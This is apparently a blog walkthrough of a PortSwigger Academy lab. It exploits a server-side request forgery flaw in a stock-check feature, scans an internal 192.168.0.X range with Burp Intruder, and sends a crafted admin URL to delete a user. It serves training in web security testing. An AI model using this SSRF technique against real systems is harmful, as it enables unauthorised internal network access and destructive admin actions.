Solving Portswigger Academy: Basic SSRF against another back-end system

This is similar to previous lab but in this lab first we need to find the back-end system where the internal application is installed and can access the admin panel.

This lab has a stock check feature which fetches data from an internal system.

To solve the lab, use the stock check functionality to scan the internal 192.168.0.X range for an admin interface on port 8080, then use it to delete the user carlos.

When you access the lab, you will see the similar page which we saw in previous lab.

Click on view details and then on Check stock. The response just show number and nothing.

Let’s first check if application is vulnerable to SSRF using burp collaborator. Change the URL with that of collaborator URL and send the request.

Response containing Collaborator host

When I checked the collaborator, I see the requests which confirms application is vulnerable to SSRF.

collaborator

Now send the request to the intruder and replace the hostname with that of IP range 192.168.0.1 and port 8080. We need to brute force the last octet of the IP address.

After the attack, arrange the result depending on response code and notice 200 for number 128. That means the IP is 192.168.0.128

Intruder result

Now send this request to repeater and modify it to delete the user carlos. The URL become like this: http://192.168.0.128:8080/admin/delete?username=carlos

Request to delete the user carlos

If we again send the request to /admin, we receive the below page.

This indicates we have successfully deleted the carols user and solved the lab.